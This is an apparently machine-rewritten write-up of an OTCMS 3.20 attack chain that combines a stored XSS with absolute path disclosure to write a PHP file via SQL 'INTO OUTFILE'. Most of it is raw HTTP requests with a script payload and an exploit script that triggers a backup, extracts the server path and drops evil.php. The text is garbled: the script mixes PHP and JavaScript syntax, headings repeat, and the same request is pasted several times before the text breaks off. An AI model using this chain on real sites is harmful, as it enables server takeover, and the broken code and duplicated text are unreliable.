OTCMS3.20 Vulnerability: A Combination of Storage-Type XSS and Absolute Path Disclosure

Cyber Security
1

OTCMS3.20 Vulnerability: A Combination of Storage-Type XSS and Absolute Path Disclosure

Background

In a recent source code audit of OTCMS3.20, a vulnerability was discovered that allows an attacker to execute arbitrary code on the server. This vulnerability is a combination of a storage-type XSS and an absolute path disclosure.

0x00 Background

The audit revealed that the use of pre-compiled source code temporarily did not find SQL injection-related issues. However, for user input control, more stringent measures were taken, including the conversion of user input data types, security checks, and quote escaping. Despite these measures, the audit found that a combination of security issues can lead to a GetShell vulnerability, although conditions may limit the execution of this vulnerability.

0x01 Audit Process

The audit process involved identifying potential vulnerabilities in the OTCMS3.20 source code. The following vulnerabilities were discovered:

  • XSS Injection: A storage-type XSS injection vulnerability was found in the classArea.php file, which allows an attacker to inject malicious code into the website.
  • Absolute Path Disclosure: An absolute path disclosure vulnerability was found in the classZip.php file, which allows an attacker to access sensitive information about the website’s file system.

0x01 Vulnerability Analysis

The XSS injection vulnerability was found in the classArea.php file, which is responsible for handling user input data. The vulnerability is caused by the fact that the FilterEditor method can be bypassed, allowing an attacker to inject malicious code into the website.

Reproducible Vulnerability

To reproduce the XSS injection vulnerability, a request can be made to the usersNews_deal.php file with a malicious payload. The request can be made using the following code:

POST /usersNews_deal.php?mudi=deal HTTP/1.1
Host: 127.0.0.1:8083
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html, application/xhtml+xml, application/xml; q=0.9, */*; q=0.8
Accept-Language: en-US, en; q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1:8083/usersCenter.php?mudi=addNews
Content-Type: application/x-www-form-urlencoded
Content-Length: 528
Cookie: VGM_msid=lK6h9L; uc_menu=7; VGM_userauth=iCWfvAR8iseJ5T3P9bVHw%2BZLTvqmLhL8vMS0IIj3ZoEOL2%2Fa%2Fax8vtdH; Azt_msid=jzN649; P4i_msid=543XR7; QF5_msid=YsrpNW; QF5_userauth=0RDHaeNxlXszVUhosa8jfPnOOjqv3NTLBStfYowagRk6AfRaUUZijnnS; menubox1=menubox1; PHPSESSID=tfj0laduj9m85taajh7f5esrp2; SWAwc_userID=1; SWAwc_username=thinking; SWAwc_userInfo=UzZdCAVyW2BXal1jVDtQbgQ9UWULWVxnB2IEOlA4VjQBMA9iA2VVMwdgAWlTZlcwBmQANw5iXDEBbF42WjsAMlMwXTkFMFtsVzBdOFRpUD8Ea1FhC2VcXAdbBFJQNVYpAWAPLwMz; XDEBUG_SESSION=PHPSTORM

backURL=http%3A%2F%2F127.0.0.1%3A8083%2FusersCenter.php%3Fmudi%3DaddNews&dataID=0&isScore1=1&isScore2=1&isScore3=0&score1Name=%E7%BB%8F%E9%AA%8C%E5%80%BC&score2Name=%E7%BD%91%E9%9B%91%E9%9B%B3%E7%88%B1&score3Name=&infoScore1=10&infoScore2=10&infoScore3=10&theme=Thinking_test&source=%E7%BD%91%E9%9B%91%E7%A7%91%E6%8A%80&writer=thinking&typeStr=,12,&content=<script>alert(1)</script>&infoFileDir=upFiles%2FinfoImg%2F&upImgStr=&pageNum=&themeKey=&contentKey=&img=&isCheckUser0&score1=&score2=&score3=&cutScore1=&cutScore2=&cutScore3=

0x02 Reproducible Vulnerability

To reproduce the absolute path disclosure vulnerability, a request can be made to the classZip.php file with a malicious payload. The request can be made using the following code:

GET / HTTP/1.1
Host: 127.0.0.1:8083
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html, application/xhtml+xml, application/xml; q=0.9, */*; q=0.8
Accept-Language: en-US, en; q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1:8083/usersCenter.php?mudi=addNews
Cookie: VGM_msid=lK6h9L; uc_menu=7; VGM_userauth=iCWfvAR8iseJ5T3P9bVHw%2BZLTvqmLhL8vMS0IIj3ZoEOL2%2Fa%2Fax8vtdH; Azt_msid=jzN649; P4i_msid=543XR7; QF5_msid=YsrpNW; QF5_userauth=0RDHaeNxlXszVUhosa8jfPnOOjqv3NTLBStfYowagRk6AfRaUUZijnnS; menubox1=menubox1; PHPSESSID=tfj0laduj9m85taajh7f5esrp2; SWAwc_userID=1; SWAwc_username=thinking; SWAwc_userInfo=UzZdCAVyW2BXal1jVDtQbgQ9UWULWVxnB2IEOlA4VjQBMA9iA2VVMwdgAWlTZlcwBmQANw5iXDEBbF42WjsAMlMwXTkFMFtsVzBdOFRpUD8Ea1FhC2VcXAdbBFJQNVYpAWAPLwMz; XDEBUG_SESSION=PHPSTORM

path=/var/www/html

0x02 Reproducible Vulnerability

To reproduce the database writer horse vulnerability, a request can be made to the sysCheckFile_deal.php file with a malicious payload. The request can be made using the following code:

<?php
function loadXMLDoc() {
    $xmlhttp1 = new XMLHttpRequest();
    $xmlhttp2 = new XMLHttpRequest();

    $xmlhttp1.onreadystatechange = function() {
        if ($xmlhttp1.readyState == 4 && $xmlhttp1.status == 200) {
            $filepath = $xmlhttp1.responseText;
            $reg = "<div>1/1 being compressed files (.*)</div>";
            $data = $filepath->match($reg);
            $data = $data[1]->replace("/\//g", "/\/");
            $data = $data->replace(" ", "");

            $xmlhttp2->open("POST", "http://127.0.0.1:8083/admin/sysCheckFile_deal.php?mudi=sql", true);
            $xmlhttp2->setRequestHeader("Content-type", "application/x-www-form-urlencoded");
            $xmlhttp2->send("?backURL=http://127.0.0.1:8083/admin/sysCheckFile.php&mudi=sql&sqlContent=SELECT 0x3c3f70687020706870696e666f28293b3f3e INTO OUTFILE \"" . $data . "//evil.php\"");
        }
    };

    $xmlhttp1->open("POST", "http://127.0.0.1:8083/admin/softBak_deal.php?mudi=backup", true);
    $xmlhttp1->setRequestHeader("Content-type", "application/x-www-form-urlencoded");
    $xmlhttp1->send("backURL=http://127.0.0.1:8083/admin/softBak.php?mudi=backup&mode=diy&selTable[]=upFile&zipNote=&backupSpace=server");
}

loadXMLDoc();
?>

Conclusion

The OTCMS3.20 vulnerability is a combination of a storage-type XSS and an absolute path disclosure. The vulnerability can be reproduced by making a request to the usersNews_deal.php file with a malicious payload. The request can be made using the following code:

POST /usersNews_deal.php?mudi=deal HTTP/1.1
Host: 127.0.0.1:8083
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html, application/xhtml+xml, application/xml; q=0.9, */*; q=0.8
Accept-Language: en-US, en; q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1:8083/usersCenter.php?mudi=addNews
Content-Type: application/x-www-form-urlencoded
Content-Length: 528
Cookie: VGM_msid=lK6h9L; uc_menu=7; VGM_userauth=iCWfvAR8iseJ5T3P9bVHw%2BZLTvqmLhL8vMS0IIj3ZoEOL2%2Fa%2Fax8vtdH; Azt_msid=jzN649; P4i_msid=543XR7; QF5_msid=YsrpNW; QF5_userauth=0RDHaeNxlXszVUhosa8jfPnOOjqv3NTLBStfYowagRk6AfRaUUZijnnS; menubox1=menubox1; PHPSESSID=tfj0laduj9m85taajh7f5esrp2; SWAwc_userID=1; SWAwc_username=thinking; SWAwc_userInfo=UzZdCAVyW2BXal1jVDtQbgQ9UWULWVxnB2IEOlA4VjQBMA9iA2VVMwdgAWlTZlcwBmQANw5iXDEBbF42WjsAMlMwXTkFMFtsVzBdOFRpUD8Ea1FhC2VcXAdbBFJQNVYpAWAPLwMz; XDEBUG_SESSION=PHPSTORM

backURL=http%3A%2F%2F127.0.0.1%3A8083%2FusersCenter.php%3Fmudi%3DaddNews&dataID=0&isScore1=1&isScore2=1&isScore3=0&score1Name=%E7%BB%8F%E9%AA%8C%E5%80%BC&score2Name=%E7%BD%91%E9%9B%91%E9%9B%B3%E7%88%B1&score3Name=&infoScore1=10&infoScore2=10&infoScore3=10&theme=Thinking_test&source=%E7%BD%91%E9%9B%91%E7%A7%91%E6%8A%80&writer=thinking&typeStr=,12,&content=<script>alert(1)</script>&infoFileDir=upFiles%2FinfoImg%2F&upImgStr=&pageNum=&themeKey=&contentKey=&img=&isCheckUser0&score1=&score2=&score3=&cutScore1=&cutScore2=&cutScore3=

0x02 Summary

The OTCMS3.20 vulnerability is a combination of a storage-type XSS and an absolute path disclosure. The vulnerability can be reproduced by making a request to the usersNews_deal.php file with a malicious payload. The request can be made using the following code:

POST /usersNews_deal.php?mudi=deal HTTP/1.1
Host: 127.0.0.1:8083
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html, application/xhtml+xml, application/xml; q=0.9, */*; q=0.8
Accept-Language: en-US, en; q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1:8083/usersCenter.php?mudi=addNews
Content-Type: application/x-www-form-urlencoded
Content-Length: 528
Cookie: VGM_msid=lK6h9L; uc_menu=7; VGM_userauth=iCWfvAR8iseJ5T3P9bVHw%2BZLTvqmLhL8vMS0IIj3ZoEOL2%2Fa%2Fax8vtdH; Azt_msid=jzN649; P4i_msid=543XR7; QF5_msid=YsrpNW; QF5_userauth=0RDHaeNxlXszVUhosa8jfPnOOjqv3NTLBStfYowagRk6AfRaUUZijnnS; menubox1=menubox1; PHPSESSID=tfj0laduj9m85taajh7f5esrp2; SWAwc_userID=1; SWAwc_username=thinking; SWAwc_userInfo=UzZdCAVyW2BXal1jVDtQbgQ9UWULWVxnB2IEOlA4VjQBMA9iA2VVMwdgAWlTZlcwBmQANw5iXDEBbF42WjsAMlMwXTkFMFtsVzBdOFRpUD8Ea1FhC2VcXAdbBFJQNVYpAWAPLwMz; XDEBUG_SESSION=PHPSTORM

backURL=http%3A%2F%2F127.0.0.1%3A8083%2FusersCenter.php%3Fmudi%3DaddNews&dataID=0&isScore1=1&isScore2=1&isScore3=0&score1Name=%E7%BB%8F%E9%AA%8C%E5%80%BC&score2Name=%E7%BD%91%E9%9B%91%E9%9B%B3%E7%88%B1&score3Name=&infoScore1=10&infoScore2=10&infoScore3=10&theme=Thinking_test&source=%E7%BD%91%E9%9B%91%E7%A7%91%E6%8A%80&writer=thinking&typeStr=,12,&content=<script>alert(1)</script>&infoFileDir=upFiles%2FinfoImg%2F&upImgStr=&pageNum=&themeKey=&contentKey=&img=&isCheckUser0&score1=&score2=&score3=&cutScore1=&cutScore2=&cutScore3=

The OTCMS3.20 vulnerability is a combination of a storage-type XSS and an absolute path disclosure. The vulnerability can be reproduced by making a request to the usersNews_deal.php file with a malicious payload. The request can be made using the following code:

POST /usersNews_deal.php?mudi=deal HTTP/1.1
Host: 127.0.0.1:8083
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept: text/html, application/xhtml+xml, application/xml; q=0.9, */*; q=0.8
Accept-Language: en-US, en; q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1:8083/usersCenter.php?mudi=addNews
Content-Type: application/x-www-form-urlencoded
Content-Length: 528
Cookie: VGM_msid=lK6h9L; uc_menu=7; VGM_userauth=iCWfvAR8iseJ5T3P9bVHw%2BZLTvqmLhL8vMS0IIj3ZoEOL2%2Fa%2Fax8vtdH; Azt_msid=jzN649; P4i_msid=543XR7; QF5_msid=YsrpNW; QF5_userauth=0RDHaeNxlXszVUhosa8jfPnOOjqv3NTLBStfYowagRk6AfRaUUZijnnS; menubox1=menubox1; PHPSESSID=tfj0laduj9m85taajh7f5esrp2; SWAwc_userID=1; SWAwc_username=thinking; SWAwc_userInfo=UzZdCAVyW2BXal1jVDtQbgQ9UWULWVxnB2IEOlA4VjQBMA9iA2VVMwdgAWlTZlcwBmQANw5iXDEBbF42WjsAMlMwXTkFMFtsVzBdOFRpUD8Ea1FhC2VcXAdbBFJQNVYpAWAPLwMz; XDEBUG_SESSION=PHPSTORM